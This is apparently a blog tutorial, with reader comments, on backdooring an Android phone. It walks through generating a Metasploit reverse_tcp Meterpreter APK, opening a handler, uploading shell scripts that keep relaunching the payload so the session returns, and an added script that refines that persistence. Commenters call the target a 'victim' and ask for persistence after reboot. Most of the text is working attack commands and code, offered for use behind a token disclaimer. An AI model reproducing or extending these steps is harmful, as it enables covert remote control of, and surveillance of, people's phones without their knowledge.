How to make a persistent Android backdoor using Metasploit

Metasploit is one of the most powerful pentesting and exploitation frameworks out there, and in this tutorial I’ll show you how to use it to plant a backdoor on an Android phone whose user installs and opens your APK, how to get a Meterpreter session from it, and how to keep that session coming back.

DISCLAIMER: All the information in this article is intended for educational purposes only. I am not responsible for any misuse. 

Step 0: Fire up Metasploit

If you’re using Kali Linux, BackBox or BackTrack, Metasploit comes pre-installed. Otherwise, you can download it from: https://www.metasploit.com

To start it,  go to your terminal and type:

msfconsole

Wait a moment and the Metasploit console (msfconsole) will start.

Step 1: Create your payload

Open a new terminal and type the following. Replace the whole of <your public ip address> with your address, angle brackets included: if you leave the brackets in, bash treats < and > as redirections and fails with “No such file or directory”.

msfpayload android/meterpreter/reverse_tcp LHOST=<your public ip address> R > /root/<name>.apk

LHOST is the address the phone will connect back to: your public IP if the phone reaches you over the internet (you then have to forward the listening port from your router to your machine), or your LAN IP if the phone is on the same network. The port defaults to 4444 (LPORT) and must match the handler in Step 2. On current Metasploit releases msfpayload has been removed; msfvenom does the same job, with -p selecting the payload and -o naming the output file.

This creates the payload APK in your root folder. It is not an exploit: nothing happens until the target installs and opens the app.

Step 2: Set up the handler

Now go back to the first terminal, where msfconsole should still be open, and type:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST <your internal ip>

exploit

LHOST here is the address of the local interface the handler listens on (your internal IP, or 0.0.0.0 for all interfaces), which is why it can differ from the public IP baked into the APK. If you changed LPORT in Step 1, set the same value here.

A listener should open. Keep it running and get the APK onto the target device. The target has to allow installation from unknown sources, install the app and launch it; the payload only runs once the app is opened. When it connects back you have a Meterpreter session, that is, your backdoor. Now let’s make it persistent!



Step 3: The persistence script.

Go to your root folder and create a new text file.

Type the following lines into it rather than pasting them: text copied from a web page often carries Windows line endings or non-breaking spaces, and the Android shell will refuse to run the script.

#!/system/bin/sh
# Re-launch the Metasploit stage every 20 seconds so the session comes back
# whenever the target closes the app or the connection drops.
while :
do
    am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 20
done

Save it as <name>.sh; the .sh extension is what you will reference later. The loop starts the app’s main activity (package com.metasploit.stage) over and over, so every time the stage is killed it reconnects to your handler within 20 seconds. Note that Android has no /bin/bash, which is why the shebang points at /system/bin/sh. If am answers “unable to resolve Intent … pkg=--user”, your Android version doesn’t understand the --user flag; drop --user 0 from the line.

Step 4: Upload it!

Go to your Meterpreter session and type:

cd /

cd /sdcard/Download

Check if you are in the correct directory by typing:

ls

ls should list that folder’s contents. Depending on the Android version, /sdcard resolves to /storage/emulated/legacy or /storage/emulated/0; either is fine.

Now upload the script:

upload <name>.sh

The path is resolved on your machine, so if you did not start msfconsole from /root, give the full local path (upload /root/<name>.sh).

Step 5: Execute!

Type:

shell

Now,  go to the place where you uploaded the script:

cd /

cd /sdcard/Download

Now,  type:

sh <name>.sh

Now press ctrl+c to leave the shell; Meterpreter asks whether to terminate the channel, answer y. You are back at the meterpreter prompt while the loop keeps running on the phone. If you find the session does not come back after you leave the shell, the loop died with the channel; start it detached instead with sh <name>.sh & so it isn’t tied to the shell channel.
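The loop in Steps 3 to 5 fires am start every 20 seconds no matter what, which brings the app to the foreground on the target each time. The script below is an added example, not the one from the original post: it only relaunches when no process for the stage package shows up in ps, and it is written for Android’s /system/bin/sh (no bash-isms, no pgrep or awk, since older toolbox builds lack them). The package and activity names are the ones this page uses; the interval, the ps -A fallback and the sample ps listing used for the self-check are assumptions.

```shell
#!/system/bin/sh
# Added example (not from the original post): relaunch the Meterpreter stage
# only when it is no longer running, instead of blindly every 20 seconds.

PKG="com.metasploit.stage"
ACTIVITY="$PKG/.MainActivity"
INTERVAL=20

# Constructed ps listing, used only by the self-check; the real loop feeds
# live ps output to stage_running instead.
SAMPLE_PS='USER     PID   PPID  VSIZE  RSS   WCHAN    PC         NAME
root      1     0     640    496   ffffffff 00000000 S /init
u0_a55    2187  142   512000 40000 ffffffff 00000000 S com.android.chrome
u0_a61    2301  142   498000 35000 ffffffff 00000000 S com.metasploit.stage'

# Reads a ps listing on stdin; returns 0 if a process whose name is exactly
# $PKG appears (Android ps prints the package name as the last column).
stage_running() {
    grep -q " $PKG\$"
}

# Prints the process list. Newer Android releases only show the caller's own
# processes unless -A is given; the fallback to plain ps is an assumption for
# older toolbox builds that reject -A.
list_procs() {
    ps -A 2>/dev/null || ps
}

# Starts the stage's main activity if it is not running.
# Returns 1 (did nothing) when the stage is already up, otherwise am's status.
relaunch_if_dead() {
    if list_procs | stage_running; then
        return 1
    fi
    am start --user 0 -a android.intent.action.MAIN -n "$ACTIVITY" >/dev/null 2>&1
}

# Main loop: check every $INTERVAL seconds, relaunch only when needed.
persist_loop() {
    while :
    do
        relaunch_if_dead
        sleep "$INTERVAL"
    done
}

# Self-check against the constructed listing: returns 0 if the matcher finds
# the stage and does not match a look-alike package name.
self_check() {
    printf '%s\n' "$SAMPLE_PS" | stage_running || return 1
    printf '%s\n' "$SAMPLE_PS" | grep -v "$PKG" | stage_running && return 1
    printf 'u0_a62 2302 142 S %s2\n' "$PKG" | stage_running && return 1
    return 0
}

# The loop only starts when invoked as: sh <name>.sh run
# so that sourcing or running the file without arguments is side-effect free.
case "${1:-}" in
    run) persist_loop ;;
    check) self_check && echo "matcher ok" ;;
esac
```

Upload it the same way as in Step 4 and start it from the Meterpreter shell with sh <name>.sh run (or sh <name>.sh run & to detach it). The matcher anchors on a space before and end-of-line after the package name, so com.metasploit.stage2 or a path containing the name would not count as the stage being alive.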

Step 6: Testing!

Close the msfconsole terminal entirely. Open a new terminal and redo Step 2. Within about 20 seconds (the sleep interval in the script) the loop relaunches the app on the phone and your handler gets a fresh Meterpreter session, without the target touching anything.

Done!

Note: the persistence is lost when the phone reboots. The loop is just a shell process, and nothing restarts it at boot; the app itself stays installed, so you would need the target to open it again.

7 Thoughts to “How to make a persistent Android backdoor using Metasploit”

  1. Rohan Juneja

    Argh... I just can’t get past Step 1. Every time, it just shows this message:
    bash: my_public_IP_address: No such file or directory
    Of course, here my_public_IP_address means what I really entered as my IP address.
    Please help me out.

    1. Admin

      Haven’t tried this myself, but did you replace “your public ip address” with your IP? Let’s hope the author will answer you soon 🙂

      1. Rohan Juneja

        Yeah, I did. It didn’t work out at all…

  2. pain_tester

    Hi, very nice, it works!!!

    Any idea for making it persistent after reboot?

    When I reboot the phone I get a session because it starts the main activity,

    But the shell doesn’t work anymore:

    “Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.”

    Does anyone know where the main activity is located after a reboot?

    Ty

    1. Rohan Juneja

      Hey Pain_tester, wait, it actually worked? What did you enter as your public IP address? The IP address of the phone or of the computer? It just isn’t working for me. Can you help me out?

  3. aditya

    Error: Activity not started, unable to resolve Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10000000 pkg=–user }

  4. Tono

    It doesn’t work after the victim reboots.
    Help me please...
